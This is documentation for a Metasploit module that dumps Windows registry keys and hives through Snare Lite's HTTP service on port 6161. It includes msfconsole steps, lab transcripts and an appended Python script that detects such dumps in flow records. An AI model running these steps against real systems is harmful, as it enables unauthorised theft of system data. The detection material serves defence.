## Description

This module uses the Registry Dump feature of the [Snare Lite for Windows](https://sourceforge.net/projects/snare/) HTTP service on 6161/TCP to retrieve the Windows registry. The Registry Dump functionality is unavailable in Snare Enterprise.

**Note: The Registry Dump functionality accepts only one connected client at a time. Requesting a large key/hive will cause the service to become unresponsive until the server completes the request.**

## Vulnerable Application

SNARE (System iNtrusion Analysis and Reporting Environment) is a series of log collection agents that facilitate centralised analysis of audit log data.

This module has been tested successfully with Snare Lite for Windows version 4.0.2.0 on Windows XP SP3.

Snare Lite for Windows is no longer supported; however, a [free trial is available](http://www.snarealliance.com/snare-open-source-agent-downloads-submission/) from the Snare Alliance website.

## Verification Steps

1. Start `msfconsole`
2. Do: `use auxiliary/gather/snare_registry`
3. Do: `set rhost [IP]`
4. Do: `set HttpUsername [USERNAME]`
5. Do: `set HttpPassword [PASSWORD]`
6. Do: `run`
7. You should get a copy of *HKLM\HARDWARE\DESCRIPTION\System* from the remote Windows system

## Options

**HttpUsername**

The username for Snare remote access (default: `snare`).

**HttpPassword**

The password for Snare remote access (default: blank).

**REG_DUMP_KEY**

Retrieve the specified registry key and all sub-keys.

**REG_DUMP_ALL**

Retrieve the entire Windows registry.

**TIMEOUT**

Timeout in seconds for downloading each registry key/hive.

## Scenarios

Retrieve a specific registry key:

```
msf auxiliary(snare_registry) > set REG_DUMP_KEY HKLM\\HARDWARE\\DESCRIPTION\\System
REG_DUMP_KEY => HKLM\HARDWARE\DESCRIPTION\System
msf auxiliary(snare_registry) > run

[*] 192.168.18.155:6161 - Retrieving registry key 'HKLM\\HARDWARE\\DESCRIPTION\\System'...
[+] 192.168.18.155:6161 - Retrieved key successfully (23092 bytes)
[+] File saved in: /root/.msf4/loot/20151225133011_default_192.168.18.155_snare.registry_842138.txt
[*] Auxiliary module execution completed
```

Retrieve an entire hive:

```
msf auxiliary(snare_registry) > set REG_DUMP_KEY HKLM
REG_DUMP_KEY => HKLM
msf auxiliary(snare_registry) > run

[*] 192.168.18.155:6161 - Retrieving registry hive 'HKLM'...
[+] 192.168.18.155:6161 - Retrieved key successfully (10657975 bytes)
[+] File saved in: /root/.msf4/loot/20151225133147_default_192.168.18.155_snare.registry_247207.txt
[*] Auxiliary module execution completed
```

Retrieve the entire registry:

```
msf auxiliary(snare_registry) > set REG_DUMP_ALL true
REG_DUMP_ALL => true
msf auxiliary(snare_registry) > run

[*] 192.168.18.155:6161 - Retrieving list of registry hives ...
[+] 192.168.18.155:6161 - Found 5 registry hives (HKEY_CLASSES_ROOT, HKEY_CURRENT_CONFIG, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS)
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CLASSES_ROOT'...
[+] 192.168.18.155:6161 - Retrieved key successfully (3933816 bytes)
[+] File saved in: /root/.msf4/loot/20151225133222_default_192.168.18.155_snare.registry_070659.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_CONFIG'...
[+] 192.168.18.155:6161 - Retrieved key successfully (5605 bytes)
[+] File saved in: /root/.msf4/loot/20151225133222_default_192.168.18.155_snare.registry_376606.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_USER'...
[+] 192.168.18.155:6161 - Retrieved key successfully (269927 bytes)
[+] File saved in: /root/.msf4/loot/20151225133223_default_192.168.18.155_snare.registry_653681.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_LOCAL_MACHINE'...
[+] 192.168.18.155:6161 - Retrieved key successfully (11446508 bytes)
[+] File saved in: /root/.msf4/loot/20151225133336_default_192.168.18.155_snare.registry_003003.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_USERS'...
[+] 192.168.18.155:6161 - Retrieved key successfully (1668306 bytes)
[+] File saved in: /root/.msf4/loot/20151225133342_default_192.168.18.155_snare.registry_236335.txt
[*] Auxiliary module execution completed
```
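The transcripts above give a defender a recognisable traffic shape: a single key is tens of kilobytes, a hive is megabytes, and `REG_DUMP_ALL` walks all five root hives in consecutive sessions to 6161/TCP. The following Python script, an added example that is not part of the module documentation, flags that shape in flow records. It assumes a whitespace-separated flow format (timestamp, client, server, destination port, bytes from client, bytes from server) and thresholds derived from the sizes in the transcripts; both are assumptions, not anything Snare or the module defines.

```python
"""Flag flow records that look like Snare Lite registry dumps over TCP 6161."""
from collections import defaultdict

SNARE_PORT = 6161
HIVE_BYTES = 1024 * 1024      # one key is ~23 KB in the transcript; whole hives run to MBs
ALL_HIVES_SESSIONS = 5        # REG_DUMP_ALL retrieves the five root hives one after another

def parse_flow(line):
    """Assumed flow format: 'ts client server dport bytes_in bytes_out'.
    bytes_out is what the server sent back to the client."""
    _ts, client, server, dport, bytes_in, bytes_out = line.split()
    return client, server, int(dport), int(bytes_in), int(bytes_out)

def find_registry_dumps(lines):
    """Return (client, server, sessions, server_bytes, reason) per suspicious pair."""
    stats = defaultdict(lambda: [0, 0])          # (client, server) -> [sessions, bytes]
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        client, server, dport, _, bytes_out = parse_flow(line)
        if dport != SNARE_PORT:
            continue
        stats[(client, server)][0] += 1
        stats[(client, server)][1] += bytes_out
    findings = []
    for (client, server), (sessions, sbytes) in sorted(stats.items()):
        reasons = []
        if sbytes >= HIVE_BYTES:
            reasons.append("hive-sized transfer from the registry-dump port")
        if sessions >= ALL_HIVES_SESSIONS:
            reasons.append("repeated dump sessions (REG_DUMP_ALL pattern)")
        if reasons:
            findings.append((client, server, sessions, sbytes, "; ".join(reasons)))
    return findings

# Constructed sample, sized after the transcripts (one key, one hive, all hives, one benign flow).
SAMPLE_FLOWS = """\
1451050211 192.168.18.10 192.168.18.155 6161 412 23092
1451050307 192.168.18.10 192.168.18.155 6161 380 10657975
1451050342 192.168.18.20 192.168.18.155 6161 350 3933816
1451050342 192.168.18.20 192.168.18.155 6161 351 5605
1451050343 192.168.18.20 192.168.18.155 6161 349 269927
1451050416 192.168.18.20 192.168.18.155 6161 352 11446508
1451050422 192.168.18.20 192.168.18.155 6161 341 1668306
1451050500 192.168.18.30 192.168.18.155 80 200 1500
"""

if __name__ == "__main__":
    for client, server, sessions, sbytes, reason in find_registry_dumps(SAMPLE_FLOWS.splitlines()):
        print(f"{client} -> {server}: {sessions} sessions, {sbytes} bytes: {reason}")
```

Because the service serves one client at a time, a host that is unresponsive on 6161/TCP while such a transfer is in progress is consistent with the note in the Description, which is a second signal worth correlating.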